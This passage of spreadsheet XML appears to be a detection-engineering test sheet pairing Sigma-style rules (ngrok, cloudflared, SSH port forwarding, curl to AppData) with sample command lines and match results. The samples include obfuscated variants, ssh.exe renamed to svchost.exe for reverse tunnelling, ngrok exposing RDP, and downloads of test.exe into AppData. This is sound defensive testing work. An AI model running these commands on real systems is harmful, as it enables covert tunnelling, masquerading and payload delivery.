          <t>0e8cfe08-02c9-4815-a2f8-0d157b7ed33e</t>
        </is>
      </c>
      <c r="E128" s="43" t="inlineStr">
        <is>
          <t>copy "C:\Program Files\Google\Chrome\Application\chrome.exe" C:\Windows\Temp\sysupdate.exe &amp; C:\Windows\Temp\sysupdate.exe --headless --dump-dom https://example.com/file.txt</t>
        </is>
      </c>
      <c r="F128" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G128" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H128" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I128" s="43" t="n"/>
      <c r="J128" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K128" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="129" ht="15.75" customHeight="1" s="42">
      <c r="A129" s="43" t="n"/>
      <c r="B129" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_run</t>
        </is>
      </c>
      <c r="C129" s="43" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Execution</t>
        </is>
      </c>
      <c r="D129" s="43" t="inlineStr">
        <is>
          <t>9a019ffc-3580-4c9d-8d87-079f7e8d3fd4</t>
        </is>
      </c>
      <c r="E129" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "set TUNNEL_TOKEN=eyJhbGci... &amp;&amp; cloudflared.exe tunnel run"</t>
        </is>
      </c>
      <c r="F129" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G129" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H129" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I129" s="43" t="n"/>
      <c r="J129" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K129" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="130" ht="15.75" customHeight="1" s="42">
      <c r="A130" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B130" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_ngrok</t>
        </is>
      </c>
      <c r="C130" s="43" t="inlineStr">
        <is>
          <t>PUA - Ngrok Execution</t>
        </is>
      </c>
      <c r="D130" s="43" t="inlineStr">
        <is>
          <t>ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31</t>
        </is>
      </c>
      <c r="E130" s="43" t="inlineStr">
        <is>
          <t>ngrok.exe  tcp  3389</t>
        </is>
      </c>
      <c r="F130" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G130" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H130" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I130" s="43" t="n"/>
      <c r="J130" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K130" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="131" ht="15.75" customHeight="1" s="42">
      <c r="A131" s="43" t="inlineStr">
        <is>
          <t>t1572</t>
        </is>
      </c>
      <c r="B131" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_ngrok</t>
        </is>
      </c>
      <c r="C131" s="43" t="inlineStr">
        <is>
          <t>PUA - Ngrok Execution</t>
        </is>
      </c>
      <c r="D131" s="43" t="inlineStr">
        <is>
          <t>ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31</t>
        </is>
      </c>
      <c r="E131" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "ngrok.exe t^c^p 3389"</t>
        </is>
      </c>
      <c r="F131" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G131" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H131" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I131" s="43" t="n"/>
      <c r="J131" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K131" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="132" ht="15.75" customHeight="1" s="42">
      <c r="A132" s="43" t="n"/>
      <c r="B132" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C132" s="44" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D132" s="44" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E132" s="44" t="inlineStr">
        <is>
          <t>ssh.exe -F ssh_config_with_forwarding.txt user@target</t>
        </is>
      </c>
      <c r="F132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I132" s="43" t="n"/>
      <c r="J132" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K132" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="133" ht="15.75" customHeight="1" s="42">
      <c r="A133" s="43" t="n"/>
      <c r="B133" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C133" s="44" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D133" s="44" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E133" s="44" t="inlineStr">
        <is>
          <t>ssh.exe -o "RemoteForward 8080 localhost:80" user@10.10.10.10</t>
        </is>
      </c>
      <c r="F133" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G133" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H133" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I133" s="43" t="n"/>
      <c r="J133" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K133" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="134" ht="15.75" customHeight="1" s="42">
      <c r="A134" s="43" t="n"/>
      <c r="B134" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C134" s="44" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D134" s="44" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E134" s="44" t="inlineStr">
        <is>
          <t>ssh.exe -R8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F134" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G134" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H134" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I134" s="43" t="n"/>
      <c r="J134" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K134" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="135" ht="15.75" customHeight="1" s="42">
      <c r="A135" s="43" t="n"/>
      <c r="B135" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C135" s="44" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D135" s="44" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E135" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe -R 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F135" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G135" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H135" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I135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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K135" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="136" ht="15.75" customHeight="1" s="42">
      <c r="A136" s="43" t="n"/>
      <c r="B136" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C136" s="44" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D136" s="44" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E136" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe -r 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F136" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G136" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H136" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I136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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K136" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="137" ht="15.75" customHeight="1" s="42">
      <c r="A137" s="43" t="n"/>
      <c r="B137" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C137" s="44" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D137" s="44" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E137" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe /"R" 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F137" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G137" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H137" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I137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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K137" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="138" ht="15.75" customHeight="1" s="42">
      <c r="A138" s="43" t="n"/>
      <c r="B138" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C138" s="44" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D138" s="44" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E138" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe -"R" 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F138" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G138" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H138" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I138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38" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K138" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="139" ht="15.75" customHeight="1" s="42">
      <c r="A139" s="44" t="inlineStr">
        <is>
          <t>t1021.004</t>
        </is>
      </c>
      <c r="B139" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C139" s="44" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D139" s="44" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E139" s="44" t="inlineStr">
        <is>
          <t>ssh.exe -F ssh_config_with_forwarding.txt user@target</t>
        </is>
      </c>
      <c r="F139" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G139" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H139" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I139" s="43" t="n"/>
      <c r="J139" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K139" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="140" ht="15.75" customHeight="1" s="42">
      <c r="A140" s="44" t="inlineStr">
        <is>
          <t>t1021.004</t>
        </is>
      </c>
      <c r="B140" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C140" s="44" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D140" s="44" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E140" s="44" t="inlineStr">
        <is>
          <t>ssh.exe -o "RemoteForward 8080 localhost:80" user@10.10.10.10</t>
        </is>
      </c>
      <c r="F140" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G140" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H140" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I140" s="43" t="n"/>
      <c r="J140" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K140" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="141" ht="15.75" customHeight="1" s="42">
      <c r="A141" s="44" t="inlineStr">
        <is>
          <t>t1021.004</t>
        </is>
      </c>
      <c r="B141" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C141" s="44" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D141" s="44" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E141" s="44" t="inlineStr">
        <is>
          <t>ssh.exe -R8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F141" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G141" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H141" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I141" s="43" t="n"/>
      <c r="J141" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K141" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="142" ht="15.75" customHeight="1" s="42">
      <c r="A142" s="44" t="inlineStr">
        <is>
          <t>t1021.004</t>
        </is>
      </c>
      <c r="B142" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C142" s="44" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D142" s="44" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E142" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe -R 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F142" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G142" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H142" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I142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42" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K142" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="143" ht="15.75" customHeight="1" s="42">
      <c r="A143" s="44" t="inlineStr">
        <is>
          <t>t1021.004</t>
        </is>
      </c>
      <c r="B143" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C143" s="44" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D143" s="44" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E143" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe -r 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F143" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G143" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H143" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I143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43" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K143" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="144" ht="15.75" customHeight="1" s="42">
      <c r="A144" s="44" t="inlineStr">
        <is>
          <t>t1021.004</t>
        </is>
      </c>
      <c r="B144" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C144" s="44" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D144" s="44" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E144" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe /"R" 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F144" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G144" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H144" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I144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44" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K144" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="145" ht="15.75" customHeight="1" s="42">
      <c r="A145" s="44" t="inlineStr">
        <is>
          <t>t1021.004</t>
        </is>
      </c>
      <c r="B145" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_ssh_port_forward</t>
        </is>
      </c>
      <c r="C145" s="44" t="inlineStr">
        <is>
          <t>Port Forwarding Activity Via SSH.EXE</t>
        </is>
      </c>
      <c r="D145" s="44" t="inlineStr">
        <is>
          <t>327f48c1-a6db-4eb8-875a-f6981f1b0183</t>
        </is>
      </c>
      <c r="E145" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\OpenSSH\ssh.exe C:\Temp\svchost.exe &amp;&amp; C:\Temp\svchost.exe -"R" 8080:localhost:80 user@10.10.10.10</t>
        </is>
      </c>
      <c r="F145" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G145" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H145" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I145" s="44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145" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K145" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="146" ht="15.75" customHeight="1" s="42">
      <c r="A146" s="44" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B146" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C146" s="44" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D146" s="44" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E146" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start remote.exe -arg1 -arg2</t>
        </is>
      </c>
      <c r="F146" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G146" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H146" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I146" s="43" t="n"/>
      <c r="J146" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K146" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="147" ht="15.75" customHeight="1" s="42">
      <c r="A147" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B147" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C147" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D147" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E147" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "curl -o %A^ppData%\test.exe h^t^t^p://[example.com/test.exe]()"</t>
        </is>
      </c>
      <c r="F147" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G147" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H147" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I147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47" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K147" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="148" ht="15.75" customHeight="1" s="42">
      <c r="A148" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B148" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C148" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D148" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E148" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F148" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G148" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H148" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I148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48" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K148" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="149" ht="15.75" customHeight="1" s="42">
      <c r="A149" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B149" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C149" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D149" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E149" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F149" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G149" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H149" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I149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49" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K149" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="150" ht="15.75" customHeight="1" s="42">
      <c r="A150" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B150" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C150" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D150" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E150" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl -"o" %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F150" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G150" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H150" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I150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50" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K150" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="151" ht="15.75" customHeight="1" s="42">
      <c r="A151" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B151" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C151" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D151" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E151" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C curl -O %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F151" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G151" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H151" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I151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51" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K151" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="152" ht="15.75" customHeight="1" s="42">
      <c r="A152" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B152" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C152" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D152" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E152" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F152" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G152" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H152" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I152" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J152" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K152" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="153" ht="15.75" customHeight="1" s="42">
      <c r="A153" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B153" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C153" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D153" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E153" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" curl -o %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F153" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G153" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H153" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I153" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J153" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K153" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="154" ht="15.75" customHeight="1" s="42">
      <c r="A154" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B154" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C154" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D154" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E154" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c curl /"o" %USERPROFILE%\AppData\Roaming\test.exe http://example.com/test.exe</t>
        </is>
      </c>
      <c r="F154" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G154" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H154" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I154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54" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K154" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="155" ht="15.75" customHeight="1" s="42">
      <c r="A155" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B155" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_http_appdata</t>
        </is>
      </c>
      <c r="C155" s="44" t="inlineStr">
        <is>
          <t>Command Line Execution with Suspicious URL and AppData Strings</t>
        </is>
      </c>
      <c r="D155" s="44" t="inlineStr">
        <is>
          <t>1ac8666b-046f-4201-8aba-1951aaec03a3</t>
        </is>
      </c>
      <c r="E155" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://example.com/test.exe' -OutFile $env:APPDATA\test.exe"</t>
        </is>
      </c>
      <c r="F155" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G155" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H155" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I155" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J155" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K155" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="156" ht="15.75" customHeight="1" s="42">
      <c r="A156" s="44" t="inlineStr">
        <is>
